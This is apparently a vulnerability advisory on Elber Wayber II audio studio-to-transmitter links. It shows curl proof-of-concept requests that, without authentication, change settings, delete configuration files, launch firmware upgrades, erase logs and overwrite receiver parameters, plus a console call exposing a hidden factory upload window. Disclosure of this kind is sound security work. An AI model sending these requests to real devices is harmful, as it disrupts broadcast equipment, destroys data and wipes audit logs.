Elber Wayber Analog/Digital Audio STL 4.00 Device Config  
Vendor: Elber S.r.l.  
Product web page:  
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)  
Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)  
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)  
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)  
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)  
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)  
Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)  
Summary: Wayber II is the name of an analogue/digital microwave link  
able to transport a Mono or a MPX stereo signal from studio to audio  
transmitter. Compact and reliable, it features very high quality and  
modern technology both in signal processing and microwave section leading  
to outstanding performances.  
Desc: The device suffers from an unauthenticated device configuration and  
client-side hidden functionality disclosure.  
Tested on: NBFM Controller  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2024-5823  
Advisory URL:  
# Config fan  
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='  
Configuration applied  
# Delete config  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'  
File delete successfully  
# Launch upgrade  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'  
Upgrade launched Successfully  
# Log erase  
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'  
Logs erased  
# Until:  
# =0 ALL  
# =-2 Yesterday  
# =-8 Last week  
# =-15 Last two weeks  
# =-22 Last three weeks  
# =-31 Last month  
# Set RX config  
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'  
RX Config Applied Successfully  
# Show factory window and FPGA upload (Console)  
> cleber_show_factory_wnd()  
# Etc.